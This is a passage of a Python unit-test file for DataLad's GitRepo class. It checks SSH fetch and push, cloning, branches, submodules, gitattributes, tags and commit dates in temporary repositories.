remote:\n eq_([], repo.get_remote_branches())\n\n fetched = repo.fetch(remote=\"ssh-remote\")\n assert_in('ssh-remote/' + DEFAULT_BRANCH,\n [commit['ref'] for commit in fetched])\n assert_repo_status(repo)\n\n # the connection is known to the SSH manager, since fetch() requested it:\n assert_in(socket_path, list(map(str, ssh_manager._connections)))\n # and socket was created:\n ok_(op.exists(socket_path))\n\n # we actually fetched it:\n assert_in('ssh-remote/' + DEFAULT_BRANCH,\n repo.get_remote_branches())\n\n\n@skip_nomultiplex_ssh\n@with_tempfile\n@with_tempfile\ndef test_GitRepo_ssh_push(repo_path=None, remote_path=None):\n from datalad import ssh_manager\n\n remote_repo = GitRepo(remote_path, create=True)\n url = _path2localsshurl(remote_path)\n socket_path = op.join(str(ssh_manager.socket_dir),\n get_connection_hash('datalad-test'))\n repo = GitRepo(repo_path, create=True)\n repo.add_remote(\"ssh-remote\", url)\n\n # modify local repo:\n repo.checkout(\"ssh-test\", ['-b'])\n with open(op.join(repo.path, \"ssh_testfile.dat\"), \"w\") as f:\n f.write(\"whatever\")\n repo.add(\"ssh_testfile.dat\")\n repo.commit(\"ssh_testfile.dat added.\")\n\n # file is not known to the remote yet:\n assert_not_in(\"ssh_testfile.dat\", remote_repo.get_indexed_files())\n\n # push changes:\n pushed = list(repo.push(remote=\"ssh-remote\", refspec=\"ssh-test\"))\n # test PushInfo\n assert_in(\"refs/heads/ssh-test\", [p['from_ref'] for p in pushed])\n assert_in(\"refs/heads/ssh-test\", [p['to_ref'] for p in pushed])\n\n # the connection is known to the SSH manager, since fetch() requested it:\n assert_in(socket_path, list(map(str, ssh_manager._connections)))\n # and socket was created:\n ok_(op.exists(socket_path))\n\n # remote now knows the changes:\n assert_in(\"ssh-test\", remote_repo.get_branches())\n assert_in(\"ssh_testfile.dat\", remote_repo.get_files(\"ssh-test\"))\n\n # amend to make it require \"--force\":\n repo.commit(\"amended\", options=['--amend'])\n # push without --force should yield an error:\n res = repo.push(remote=\"ssh-remote\", refspec=\"ssh-test\")\n assert_in_results(\n res,\n from_ref='refs/heads/ssh-test',\n to_ref='refs/heads/ssh-test',\n operations=['rejected', 'error'],\n note='[rejected] (non-fast-forward)',\n remote='ssh-remote',\n )\n # now push using force:\n repo.push(remote=\"ssh-remote\", refspec=\"ssh-test\", force=True)\n # correct commit message in remote:\n assert_in(\"amended\",\n remote_repo.format_commit(\n '%s',\n list(remote_repo.get_branch_commits_('ssh-test'))[-1]\n ))\n\n\n@with_tempfile\n@with_tempfile\ndef test_GitRepo_push_n_checkout(orig_path=None, clone_path=None):\n\n origin = GitRepo(orig_path)\n clone = GitRepo.clone(orig_path, clone_path)\n filename = get_most_obscure_supported_name()\n\n with open(op.join(clone_path, filename), 'w') as f:\n f.write(\"New file.\")\n clone.add(filename)\n clone.commit(\"new file added.\")\n # TODO: need checkout first:\n clone.push(DEFAULT_REMOTE, '+{}:new-branch'.format(DEFAULT_BRANCH))\n origin.checkout('new-branch')\n ok_(op.exists(op.join(orig_path, filename)))\n\n\n@with_tempfile\n@with_tempfile\n@with_tempfile\ndef test_GitRepo_remote_update(path1=None, path2=None, path3=None):\n\n git1 = GitRepo(path1)\n git2 = GitRepo(path2)\n git3 = GitRepo(path3)\n\n git1.add_remote('git2', path2)\n git1.add_remote('git3', path3)\n\n # Setting up remote 'git2'\n with open(op.join(path2, 'masterfile'), 'w') as f:\n f.write(\"git2 in master\")\n git2.add('masterfile')\n git2.commit(\"Add something to master.\")\n git2.checkout('branch2', ['-b'])\n with open(op.join(path2, 'branch2file'), 'w') as f:\n f.write(\"git2 in branch2\")\n git2.add('branch2file')\n git2.commit(\"Add something to branch2.\")\n\n # Setting up remote 'git3'\n with open(op.join(path3, 'masterfile'), 'w') as f:\n f.write(\"git3 in master\")\n git3.add('masterfile')\n git3.commit(\"Add something to master.\")\n git3.checkout('branch3', ['-b'])\n with open(op.join(path3, 'branch3file'), 'w') as f:\n f.write(\"git3 in branch3\")\n git3.add('branch3file')\n git3.commit(\"Add something to branch3.\")\n\n git1.update_remote()\n\n # checkouts are 'tests' themselves, since they'll raise CommandError\n # if something went wrong\n git1.checkout('branch2')\n git1.checkout('branch3')\n\n branches1 = git1.get_branches()\n eq_({'branch2', 'branch3'}, set(branches1))\n\n\n@with_tempfile\n@with_tempfile\ndef test_GitRepo_get_files(src_path=None, path=None):\n src = GitRepo(src_path)\n for filename in ('some1.txt', 'some2.dat'):\n with open(op.join(src_path, filename), 'w') as f:\n f.write(filename)\n src.add(filename)\n src.commit('Some files')\n\n gr = GitRepo.clone(src.path, path)\n # get the expected files via os for comparison:\n os_files = set()\n for (dirpath, dirnames, filenames) in os.walk(path):\n rel_dir = os.path.relpath(dirpath, start=path)\n if rel_dir.startswith(\".git\"):\n continue\n for file_ in filenames:\n file_path = os.path.normpath(op.join(rel_dir, file_))\n os_files.add(file_path)\n\n # get the files via GitRepo:\n local_files = set(gr.get_files())\n remote_files = set(gr.get_files(\n branch=f\"{DEFAULT_REMOTE}/{DEFAULT_BRANCH}\"))\n\n eq_(local_files, set(gr.get_indexed_files()))\n eq_(local_files, remote_files)\n eq_(local_files, os_files)\n\n # create a different branch:\n gr.checkout('new_branch', ['-b'])\n filename = 'another_file.dat'\n with open(op.join(path, filename), 'w') as f:\n f.write(\"something\")\n gr.add(filename)\n gr.commit(\"Added.\")\n\n # now get the files again:\n local_files = set(gr.get_files())\n eq_(local_files, os_files.union({filename}))\n # retrieve remote branch again, which should not have changed:\n remote_files = set(gr.get_files(\n branch=f\"{DEFAULT_REMOTE}/{DEFAULT_BRANCH}\"))\n eq_(remote_files, os_files)\n eq_(set([filename]), local_files.difference(remote_files))\n\n # switch back and query non-active branch:\n gr.checkout(DEFAULT_BRANCH)\n local_files = set(gr.get_files())\n branch_files = set(gr.get_files(branch=\"new_branch\"))\n eq_(set([filename]), branch_files.difference(local_files))\n\n\n@with_tempfile\n@with_tempfile(mkdir=True)\n@with_tempfile\ndef test_GitRepo_get_toppath(repo=None, tempdir=None, repo2=None):\n GitRepo(repo, create=True)\n reporeal = str(Path(repo).resolve())\n eq_(GitRepo.get_toppath(repo, follow_up=False), reporeal)\n eq_(GitRepo.get_toppath(repo), repo)\n # Generate some nested directory\n GitRepo(repo2, create=True)\n repo2real = str(Path(repo2).resolve())\n nested = op.join(repo2, \"d1\", \"d2\")\n os.makedirs(nested)\n eq_(GitRepo.get_toppath(nested, follow_up=False), repo2real)\n eq_(GitRepo.get_toppath(nested), repo2)\n # and if not under git, should return None\n eq_(GitRepo.get_toppath(tempdir), None)\n\n\n@with_tempfile(mkdir=True)\ndef test_GitRepo_dirty(path=None):\n\n repo = GitRepo(path, create=True)\n ok_(not repo.dirty)\n\n # untracked file\n with open(op.join(path, 'file1.txt'), 'w') as f:\n f.write('whatever')\n ok_(repo.dirty)\n # staged file\n repo.add('file1.txt')\n ok_(repo.dirty)\n # clean again\n repo.commit(\"file1.txt added\")\n ok_(not repo.dirty)\n # modify to be the same\n with open(op.join(path, 'file1.txt'), 'w') as f:\n f.write('whatever')\n ok_(not repo.dirty)\n # modified file\n with open(op.join(path, 'file1.txt'), 'w') as f:\n f.write('something else')\n ok_(repo.dirty)\n # clean again\n repo.add('file1.txt')\n repo.commit(\"file1.txt modified\")\n ok_(not repo.dirty)\n\n # An empty directory doesn't count as dirty.\n os.mkdir(op.join(path, \"empty\"))\n ok_(not repo.dirty)\n # Neither does an empty directory with an otherwise empty directory.\n os.mkdir(op.join(path, \"empty\", \"empty-again\"))\n ok_(not repo.dirty)\n\n subm = GitRepo(repo.pathobj / \"subm\", create=True)\n (subm.pathobj / \"subfile\").write_text(u\"\")\n subm.save()\n repo.save()\n ok_(not repo.dirty)\n (subm.pathobj / \"subfile\").write_text(u\"changed\")\n ok_(repo.dirty)\n\n # User configuration doesn't affect .dirty's answer.\n repo.config.set(\"diff.ignoreSubmodules\", \"all\", scope=\"local\")\n ok_(repo.dirty)\n # GitRepo.commit currently can't handle this setting, so remove it for the\n # save() calls below.\n repo.config.unset(\"diff.ignoreSubmodules\", scope=\"local\")\n subm.save()\n repo.save()\n ok_(not repo.dirty)\n\n repo.config.set(\"status.showUntrackedFiles\", \"no\", scope=\"local\")\n create_tree(repo.path, {\"untracked_dir\": {\"a\": \"a\"}})\n ok_(repo.dirty)\n\n\n@with_tempfile(mkdir=True)\ndef test_GitRepo_get_merge_base(src=None):\n repo = GitRepo(src, create=True)\n with open(op.join(src, 'file.txt'), 'w') as f:\n f.write('load')\n repo.add('*')\n repo.commit('committing')\n\n assert_raises(ValueError, repo.get_merge_base, [])\n branch1 = repo.get_active_branch()\n branch1_hexsha = repo.get_hexsha()\n eq_(len(branch1_hexsha), 40)\n eq_(repo.get_merge_base(branch1), branch1_hexsha)\n\n # Let's create a detached branch\n branch2 = \"_detach_\"\n repo.checkout(branch2, options=[\"--orphan\"])\n # it will have all the files\n # Must not do: https://github.com/gitpython-developers/GitPython/issues/375\n # repo.git_add('.')\n repo.add('*')\n # NOTE: fun part is that we should have at least a different commit message\n # so it results in a different checksum ;)\n repo.commit(\"committing again\")\n assert(repo.get_indexed_files()) # we did commit\n assert(repo.get_merge_base(branch1) is None)\n assert(repo.get_merge_base([branch2, branch1]) is None)\n\n # Let's merge them up -- then merge base should match the master\n repo.merge(branch1, allow_unrelated=True)\n eq_(repo.get_merge_base(branch1), branch1_hexsha)\n\n # if points to some empty/non-existing branch - should also be None\n assert(repo.get_merge_base(['nonexistent', branch2]) is None)\n\n\n@with_tempfile(mkdir=True)\ndef test_GitRepo_git_get_branch_commits_(src=None):\n\n repo = GitRepo(src, create=True)\n with open(op.join(src, 'file.txt'), 'w') as f:\n f.write('load')\n repo.add('*')\n repo.commit('committing')\n # go in a branch with a name that matches the file to require\n # proper disambiguation\n repo.call_git(['checkout', '-b', 'file.txt'])\n\n commits_default = list(repo.get_branch_commits_())\n commits = list(repo.get_branch_commits_(DEFAULT_BRANCH))\n eq_(commits, commits_default)\n eq_(len(commits), 1)\n\n\n@with_tempfile\n@with_tempfile\ndef test_get_tracking_branch(o_path=None, c_path=None):\n src = GitRepo(o_path)\n for filename in ('some1.txt', 'some2.dat'):\n with open(op.join(o_path, filename), 'w') as f:\n f.write(filename)\n src.add(filename)\n src.commit('Some files')\n\n clone = GitRepo.clone(o_path, c_path)\n # Note, that the default branch might differ even if it is always 'master'.\n # For direct mode annex repositories it would then be \"annex/direct/master\"\n # for example. Therefore use whatever branch is checked out by default:\n master_branch = clone.get_active_branch()\n ok_(master_branch)\n\n eq_((DEFAULT_REMOTE, 'refs/heads/' + master_branch),\n clone.get_tracking_branch())\n\n clone.checkout('new_branch', ['-b'])\n\n eq_((None, None), clone.get_tracking_branch())\n\n eq_((DEFAULT_REMOTE, 'refs/heads/' + master_branch),\n clone.get_tracking_branch(master_branch))\n\n clone.checkout(master_branch, options=[\"--track\", \"-btopic\"])\n eq_(('.', 'refs/heads/' + master_branch),\n clone.get_tracking_branch())\n eq_((None, None),\n clone.get_tracking_branch(remote_only=True))\n\n\n@with_tempfile\ndef test_GitRepo_get_submodules(path=None):\n repo = GitRepo(path, create=True)\n\n s_abc = GitRepo(op.join(path, \"s_abc\"), create=True)\n s_abc.commit(msg=\"c s_abc\", options=[\"--allow-empty\"])\n repo.save(path=\"s_abc\")\n\n s_xyz = GitRepo(op.join(path, \"s_xyz\"), create=True)\n s_xyz.commit(msg=\"c s_xyz\", options=[\"--allow-empty\"])\n repo.save(path=\"s_xyz\")\n\n eq_([s[\"gitmodule_name\"]\n for s in repo.get_submodules(sorted_=True)],\n [\"s_abc\", \"s_xyz\"])\n\n # Limit by path\n eq_([s[\"gitmodule_name\"]\n for s in repo.get_submodules(paths=[\"s_abc\"])],\n [\"s_abc\"])\n\n # Pointing to a path within submodule should include it too\n eq_([s[\"gitmodule_name\"]\n for s in repo.get_submodules(paths=[\"s_abc/unrelated\"])],\n [\"s_abc\"])\n\n # top level should list all submodules\n eq_([s[\"gitmodule_name\"]\n for s in repo.get_submodules(paths=[repo.path])],\n [\"s_abc\", \"s_xyz\"])\n\n # Limit by non-existing/non-matching path\n eq_([s[\"gitmodule_name\"]\n for s in repo.get_submodules(paths=[\"s_unknown\"])],\n [])\n\n\n@with_tempfile\ndef test_get_submodules_parent_on_unborn_branch(path=None):\n repo = GitRepo(path, create=True)\n subrepo = GitRepo(op.join(path, \"sub\"), create=True)\n subrepo.commit(msg=\"s\", options=[\"--allow-empty\"])\n repo.save(path=\"sub\")\n eq_([s[\"gitmodule_name\"] for s in repo.get_submodules_()],\n [\"sub\"])\n\n\ndef test_to_options():\n\n class Some(object):\n\n def cmd_func(self, git_options=None, annex_options=None, options=None):\n\n git_options = git_options[:] if git_options else []\n annex_options = annex_options[:] if annex_options else []\n options = options[:] if options else []\n\n faked_cmd_call = ['git'] + git_options + ['annex'] + \\\n annex_options + ['my_cmd'] + options\n\n return faked_cmd_call\n\n eq_(Some().cmd_func(options=to_options(m=\"bla\", force=True)),\n ['git', 'annex', 'my_cmd', '--force', '-m', 'bla'])\n\n eq_(Some().cmd_func(git_options=to_options(C=\"/some/where\"),\n annex_options=to_options(JSON=True),\n options=to_options(unused=True)),\n ['git', '-C', '/some/where', 'annex', '--JSON', 'my_cmd', '--unused'])\n\n eq_(Some().cmd_func(git_options=to_options(C=\"/some/where\", split_single_char_options=False),\n annex_options=to_options(JSON=True),\n options=to_options(unused=True)),\n ['git', '-C/some/where', 'annex', '--JSON', 'my_cmd', '--unused'])\n\n\ndef test_to_options_from_gitpython():\n \"\"\"Imported from GitPython and modified.\n\n Original copyright:\n Copyright (C) 2008, 2009 Michael Trier and contributors\n Original license:\n BSD 3-Clause \"New\" or \"Revised\" License\n \"\"\"\n eq_([\"-s\"], to_options(**{'s': True}))\n eq_([\"-s\", \"5\"], to_options(**{'s': 5}))\n eq_([], to_options(**{'s': None}))\n\n eq_([\"--max-count\"], to_options(**{'max_count': True}))\n eq_([\"--max-count=5\"], to_options(**{'max_count': 5}))\n eq_([\"--max-count=0\"], to_options(**{'max_count': 0}))\n eq_([], to_options(**{'max_count': None}))\n\n # Multiple args are supported by using lists/tuples\n eq_([\"-L\", \"1-3\", \"-L\", \"12-18\"], to_options(**{'L': ('1-3', '12-18')}))\n eq_([\"-C\", \"-C\"], to_options(**{'C': [True, True, None, False]}))\n\n # order is undefined\n res = to_options(**{'s': True, 't': True})\n eq_({'-s', '-t'}, set(res))\n\n\n@with_tempfile\ndef test_GitRepo_count_objects(repo_path=None):\n\n repo = GitRepo(repo_path, create=True)\n # test if dictionary returned\n eq_(isinstance(repo.count_objects, dict), True)\n # test if dictionary contains keys and values we expect\n empty_count = {'count': 0, 'garbage': 0, 'in-pack': 0, 'packs': 0, 'prune-packable': 0,\n 'size': 0, 'size-garbage': 0, 'size-pack': 0}\n eq_(empty_count, repo.count_objects)\n\n\n# this is simply broken on win, but less important\n# https://github.com/datalad/datalad/issues/3639\n@skip_if_on_windows\n@with_tempfile\ndef test_optimized_cloning(path=None):\n # make test repo with one file and one commit\n originpath = op.join(path, 'origin')\n repo = GitRepo(originpath, create=True)\n with open(op.join(originpath, 'test'), 'w') as f:\n f.write('some')\n repo.add('test')\n repo.commit('init')\n assert_repo_status(originpath, annex=False)\n from glob import glob\n\n def _get_inodes(repo):\n return dict(\n [(os.path.join(*o.split(os.sep)[-2:]),\n os.stat(o).st_ino)\n for o in glob(os.path.join(repo.path,\n repo.get_git_dir(repo),\n 'objects', '*', '*'))])\n\n origin_inodes = _get_inodes(repo)\n # now clone it in different ways and see what happens to the object storage\n from datalad.support.network import get_local_file_url\n clonepath = op.join(path, 'clone')\n for src in (originpath, get_local_file_url(originpath, compatibility='git')):\n clone = GitRepo.clone(url=src, path=clonepath, create=True)\n clone_inodes = _get_inodes(clone)\n eq_(origin_inodes, clone_inodes, msg='with src={}'.format(src))\n rmtree(clonepath)\n# del clone\n# gc.collect()\n # Note: del needed, since otherwise WeakSingletonRepo would just\n # return the original object in second run\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_GitRepo_flyweight(path1=None, path2=None):\n\n import gc\n\n repo1 = GitRepo(path1, create=True)\n assert_is_instance(repo1, GitRepo)\n\n # Due to issue 4862, we currently still require gc.collect() under unclear\n # circumstances to get rid of an exception traceback when creating in an\n # existing directory. That traceback references the respective function\n # frames which in turn reference the repo instance (they are methods).\n # Doesn't happen on all systems, though. Eventually we need to figure that\n # out.\n # However, still test for the refcount after gc.collect() to ensure we don't\n # introduce new circular references and make the issue worse!\n gc.collect()\n\n # As long as we don't reintroduce any circular references or produce\n # garbage during instantiation that isn't picked up immediately, `repo1`\n # should be the only counted reference to this instance.\n # Note, that sys.getrefcount reports its own argument and therefore one\n # reference too much.\n assert_equal(1, sys.getrefcount(repo1) - 1)\n\n # instantiate again:\n repo2 = GitRepo(path1, create=False)\n assert_is_instance(repo2, GitRepo)\n\n # the very same object:\n ok_(repo1 is repo2)\n\n # reference the same in a different way:\n with chpwd(path1):\n repo3 = GitRepo(op.relpath(path1, start=path2), create=False)\n\n # it's the same object:\n ok_(repo1 is repo3)\n\n # and realpath attribute is the same, so they are still equal:\n ok_(repo1 == repo3)\n\n orig_id = id(repo1)\n\n # Be sure we have exactly one object in memory:\n assert_equal(1, len([o for o in gc.get_objects()\n if isinstance(o, GitRepo) and o.path == path1]))\n\n # deleting one reference doesn't change anything - we still get the same\n # thing:\n gc.collect() # TODO: see first comment above\n del repo1\n ok_(repo2 is not None)\n ok_(repo2 is repo3)\n ok_(repo2 == repo3)\n\n # re-requesting still delivers the same thing:\n repo1 = GitRepo(path1)\n assert_equal(orig_id, id(repo1))\n\n # killing all references should result in the instance being gc'd and\n # re-request yields a new object:\n del repo1\n del repo2\n\n # Killing last reference will lead to garbage collection which will call\n # GitRepo's finalizer:\n with swallow_logs(new_level=1) as cml:\n del repo3\n gc.collect() # TODO: see first comment above\n cml.assert_logged(msg=\"Finalizer called on: GitRepo(%s)\" % path1,\n level=\"Level 1\",\n regex=False)\n\n # Flyweight is gone:\n assert_not_in(path1, GitRepo._unique_instances.keys())\n # gc doesn't know any instance anymore:\n assert_equal([], [o for o in gc.get_objects()\n if isinstance(o, GitRepo) and o.path == path1])\n\n # new object is created on re-request:\n repo1 = GitRepo(path1)\n assert_equal(1, len([o for o in gc.get_objects()\n if isinstance(o, GitRepo) and o.path == path1]))\n\n\n@with_tree(tree={'ignore-sub.me': {'a_file.txt': 'some content'},\n 'ignore.me': 'ignored content',\n 'dontigno.re': 'other content'})\ndef test_GitRepo_gitignore(path=None):\n\n gr = GitRepo(path, create=True)\n sub = GitRepo(op.join(path, 'ignore-sub.me'))\n # we need to commit something, otherwise add_submodule\n # will already refuse the submodule for having no commit\n sub.add('a_file.txt')\n sub.commit()\n\n from ..exceptions import GitIgnoreError\n\n with open(op.join(path, '.gitignore'), \"w\") as f:\n f.write(\"*.me\")\n\n with assert_raises(GitIgnoreError) as cme:\n gr.add('ignore.me')\n eq_(cme.value.paths, ['ignore.me'])\n\n with assert_raises(GitIgnoreError) as cme:\n gr.add(['ignore.me', 'dontigno.re', op.join('ignore-sub.me', 'a_file.txt')])\n eq_(set(cme.value.paths), {'ignore.me', 'ignore-sub.me'})\n\n eq_(gr.get_gitattributes('.')['.'], {}) # nothing is recorded within .gitattributes\n\n\n@with_tempfile(mkdir=True)\ndef test_GitRepo_set_remote_url(path=None):\n\n gr = GitRepo(path, create=True)\n gr.add_remote('some', 'http://example.com/.git')\n eq_(gr.config['remote.some.url'],\n 'http://example.com/.git')\n # change url:\n gr.set_remote_url('some', 'http://believe.it')\n eq_(gr.config['remote.some.url'],\n 'http://believe.it')\n\n # set push url:\n gr.set_remote_url('some', 'ssh://whatever.ru', push=True)\n eq_(gr.config['remote.some.pushurl'],\n 'ssh://whatever.ru')\n\n # add remote without url\n url2 = 'http://repo2.example.com/.git'\n gr.add_remote('some-without-url', url2)\n eq_(gr.config['remote.some-without-url.url'], url2)\n # \"remove\" it\n gr.config.unset('remote.some-without-url.url', scope='local')\n with assert_raises(KeyError):\n gr.config['remote.some-without-url.url']\n eq_(set(gr.get_remotes()), {'some', 'some-without-url'})\n eq_(set(gr.get_remotes(with_urls_only=True)), {'some'})\n\n\n@with_tempfile(mkdir=True)\ndef test_gitattributes(path=None):\n gr = GitRepo(path, create=True)\n # starts without any attributes file\n ok_(not op.exists(op.join(gr.path, '.gitattributes')))\n eq_(gr.get_gitattributes('.')['.'], {})\n # bool is a tag or unsets, anything else is key/value\n gr.set_gitattributes([('*', {'tag': True}), ('*', {'sec.key': 'val'})])\n ok_(op.exists(op.join(gr.path, '.gitattributes')))\n eq_(gr.get_gitattributes('.')['.'], {'tag': True, 'sec.key': 'val'})\n # unset by amending the record, but does not remove notion of the\n # tag entirely\n gr.set_gitattributes([('*', {'tag': False})])\n eq_(gr.get_gitattributes('.')['.'], {'tag': False, 'sec.key': 'val'})\n # attributes file is not added or committed, we can ignore such\n # attributes\n eq_(gr.get_gitattributes('.', index_only=True)['.'], {})\n\n # we can send absolute path patterns and write to any file, and\n # the patterns will be translated relative to the target file\n gr.set_gitattributes([\n (op.join(gr.path, 'relative', 'ikethemike/**'), {'bang': True})],\n attrfile=op.join('relative', '.gitattributes'))\n # directory and file get created\n ok_(op.exists(op.join(gr.path, 'relative', '.gitattributes')))\n eq_(gr.get_gitattributes(\n op.join(gr.path, 'relative', 'ikethemike', 'probe')),\n # always comes out relative to the repo root, even if abs goes in\n {op.join('relative', 'ikethemike', 'probe'):\n {'tag': False, 'sec.key': 'val', 'bang': True}})\n if get_encoding_info()['default'] != 'ascii' and not on_windows:\n # do not perform this on obscure systems without anything like UTF\n # it is not relevant whether a path actually exists, and paths\n # with spaces and other funky stuff are just fine\n funky = u'{} {}'.format(\n get_most_obscure_supported_name(),\n get_most_obscure_supported_name())\n gr.set_gitattributes([(funky, {'this': 'that'})])\n eq_(gr.get_gitattributes(funky)[funky], {\n 'this': 'that',\n 'tag': False,\n 'sec.key': 'val',\n })\n\n # mode='w' should replace the entire file:\n gr.set_gitattributes([('**', {'some': 'nonsense'})], mode='w')\n eq_(gr.get_gitattributes('.')['.'], {'some': 'nonsense'})\n # mode='a' appends additional key/value\n gr.set_gitattributes([('*', {'king': 'kong'})], mode='a')\n eq_(gr.get_gitattributes('.')['.'], {'some': 'nonsense', 'king': 'kong'})\n # handle files without trailing newline\n with open(op.join(gr.path, '.gitattributes'), 'r+') as f:\n s = f.read()\n f.seek(0)\n f.write(s.rstrip())\n f.truncate()\n gr.set_gitattributes([('*', {'ding': 'dong'})], mode='a')\n eq_(gr.get_gitattributes('.')['.'],\n {'some': 'nonsense', 'king': 'kong', 'ding': 'dong'})\n\n\n@with_tempfile(mkdir=True)\ndef test_get_hexsha_tag(path=None):\n gr = GitRepo(path, create=True)\n gr.commit(msg=\"msg\", options=[\"--allow-empty\"])\n gr.tag(\"atag\", message=\"atag msg\")\n # get_hexsha() dereferences a tag to a commit.\n eq_(gr.get_hexsha(\"atag\"), gr.get_hexsha())\n\n\n@with_tempfile(mkdir=True)\ndef test_get_tags(path=None):\n from unittest.mock import patch\n\n gr = GitRepo(path, create=True)\n eq_(gr.get_tags(), [])\n eq_(gr.describe(), None)\n\n # Explicitly override the committer date because tests may set it to a\n # fixed value, but we want to check that the returned tags are sorted by\n # the date the tag (for annotaged tags) or commit (for lightweight tags)\n # was created.\n with patch.dict(\"os.environ\", {\"GIT_COMMITTER_DATE\":\n \"Thu, 07 Apr 2005 22:13:13 +0200\"}):\n create_tree(gr.path, {'file': \"\"})\n gr.add('file')\n gr.commit(msg=\"msg\")\n eq_(gr.get_tags(), [])\n eq_(gr.describe(), None)\n\n gr.tag(\"nonannotated\")\n tags1 = [{'name': 'nonannotated', 'hexsha': gr.get_hexsha()}]\n eq_(gr.get_tags(), tags1)\n eq_(gr.describe(), None)\n eq_(gr.describe(tags=True), tags1[0]['name'])\n\n first_commit = gr.get_hexsha()\n\n with patch.dict(\"os.environ\", {\"GIT_COMMITTER_DATE\":\n \"Fri, 08 Apr 2005 22:13:13 +0200\"}):\n\n create_tree(gr.path, {'file': \"123\"})\n gr.add('file')\n gr.commit(msg=\"changed\")\n\n with patch.dict(\"os.environ\", {\"GIT_COMMITTER_DATE\":\n \"Fri, 09 Apr 2005 22:13:13 +0200\"}):\n gr.tag(\"annotated\", message=\"annotation\")\n # The annotated tag happened later, so it comes last.\n tags2 = tags1 + [{'name': 'annotated', 'hexsha': gr.get_hexsha()}]\n eq_(gr.get_tags(), tags2)\n eq_(gr.describe(), tags2[1]['name'])\n\n # compare prev commit\n eq_(gr.describe(commitish=first_commit), None)\n eq_(gr.describe(commitish=first_commit, tags=True), tags1[0]['name'])\n\n gr.tag('specific', commit='HEAD~1')\n eq_(gr.get_hexsha('specific'), gr.get_hexsha('HEAD~1'))\n assert_in('specific', gr.get_tags(output='name'))\n\n # retag a different commit\n assert_raises(CommandError, gr.tag, 'specific', commit='HEAD')\n # force it\n gr.tag('specific', commit='HEAD', options=['-f'])\n eq_(gr.get_hexsha('specific'), gr.get_hexsha('HEAD'))\n\n # delete\n gr.call_git(['tag', '-d', 'specific'])\n eq_(gr.get_tags(), tags2)\n # more than one\n gr.tag('one')\n gr.tag('two')\n gr.call_git(['tag', '-d', 'one', 'two'])\n eq_(gr.get_tags(), tags2)\n\n\n@with_tree(tree={'1': \"\"})\ndef test_get_commit_date(path=None):\n gr = GitRepo(path, create=True)\n eq_(gr.get_commit_date(), None)\n\n # Let's make a commit with a custom date\n DATE = \"Wed Mar 14 03:47:30 2018 -0000\"\n DATE_EPOCH = 1520999250\n gr.add('1')\n gr.commit(\"committed\", date=DATE)\n gr = GitRepo(path, create=True)\n date = gr.get_commit_date()\n neq_(date, None)\n eq_(date, DATE_EPOCH)\n\n eq_(date, gr.get_commit_date(DEFAULT_BRANCH))\n # and even if we get into a detached head\n gr.checkout(gr.get_hexsha())\n eq_(gr.get_active_branch(), None)\n eq_(date, gr.get_commit_date(DEFAULT_BRANCH))\n\n\n@with_tree(tree={\"foo\": \"foo content\",\n \"bar\": \"bar content\"})\ndef test_fake_dates(path=None):\n gr = GitRepo(path, create=True, fake_dates=True)\n\n gr.add(\"foo\")\n gr.commit(\"commit foo\")\n\n seconds_initial = gr.config.obtain(\"datalad.fake-dates-start\")\n\n # First commit is incremented by 1 second.\n eq_(seconds_initial + 1, gr.get_commit_date())\n\n # The second commit by 2.\n gr.add(\"bar\")\n gr.commit(\"commit bar\")\n eq_(seconds_initial + 2, gr.get_commit_date())\n\n # If we checkout another branch, its time is still based on the latest\n # timestamp in any local branch.\n gr.checkout(\"other\", options=[\"--orphan\"])\n with open(op.join(path, \"baz\"), \"w\") as ofh:\n ofh.write(\"baz content\")\n gr.add(\"baz\")\n gr.commit(\"commit baz\")\n eq_(gr.get_active_branch(), \"other\")\n eq_(seconds_initial + 3, gr.get_commit_date())\n\n\n@slow # 15sec on Yarik's laptop and tripped Travis CI\n@with_tempfile(mkdir=True)\ndef test_duecredit(path=None):\n # Just to check that no obvious side-effects\n run = WitlessRunner(cwd=path).run\n cmd = [\n sys.executable, \"-c\",\n \"from datalad.support.gitrepo import GitRepo; GitRepo(%r, create=True)\" % path\n ]\n\n env = os.environ.copy()\n\n # Test with duecredit not enabled for sure\n env.pop('DUECREDIT_ENABLE', None)\n # Alternative workaround for what to be fixed by\n # https://github.com/datalad/datalad/pull/3215\n # where underlying datalad process might issue a warning since our temp\n # cwd is not matching possibly present PWD env variable\n env.pop('PWD', None)\n\n out = run(cmd, env=env, protocol=StdOutErrCapture)\n outs = ''.join(out.values()) # Let's not depend on where duecredit decides to spit out\n # All quiet\n test_string = 'Data management and distribution platform'\n assert_not_in(test_string, outs)\n\n # and now enable DUECREDIT - output could come to stderr\n env['DUECREDIT_ENABLE'] = '1'\n out = run(cmd, env=env, protocol=StdOutErrCapture)\n outs = ''.join(out.values())\n\n if external_versions['duecredit']:\n assert_in(test_string, outs)\n else:\n assert_not_in(test_string, outs)\n\n\n@with_tempfile(mkdir=True)\ndef test_GitRepo_get_revisions(path=None):\n gr = GitRepo(path, create=True)\n\n def commit(msg):\n gr.commit(msg=msg, options=[\"--allow-empty\"])\n\n # We catch the error and return empty if the current branch doesn't have a\n # commit checked out.\n eq_(gr.get_revisions(), [])\n\n # But will raise if on a bad ref name, including an unborn branch.\n with assert_raises(CommandError):\n gr.get_revisions(DEFAULT_BRANCH)\n\n # By default, we query HEAD.\n commit(\"1\")\n eq_(len(gr.get_revisions()), 1)\n\n gr.checkout(\"other\", options=[\"-b\"])\n commit(\"2\")\n\n # We can also query branch by name.\n eq_(len(gr.get_revisions(DEFAULT_BRANCH)), 1)\n eq_(len(gr.get_revisions(\"other\")), 2)\n\n # \"name\" is sugar for [\"name\"].\n eq_(gr.get_revisions(DEFAULT_BRANCH),\n gr.get_revisions([DEFAULT_BRANCH]))\n\n gr.checkout(DEFAULT_BRANCH)\n commit(\"3\")\n eq_(len(gr.get_revisions(DEFAULT_BRANCH)), 2)\n # We can pass multiple revisions...\n eq_(len(gr.get_revisions([DEFAULT_BRANCH, \"other\"])), 3)\n # ... or options like --all and --branches\n eq_(gr.get_revisions([DEFAULT_BRANCH, \"other\"]),\n gr.get_revisions(options=[\"--all\"]))\n\n # Ranges are supported.\n eq_(gr.get_revisions(DEFAULT_BRANCH + \"..\"), [])\n\n\n@xfail_buggy_annex_info\n@with_tree({\"foo\": \"foo\",\n \".gitattributes\": \"* annex.largefiles=anything\"})\ndef test_gitrepo_add_to_git_with_annex_v7(path=None):\n from datalad.support.annexrepo import AnnexRepo\n ar = AnnexRepo(path, create=True, version=7)\n gr = GitRepo(path)\n gr.add(\"foo\")\n 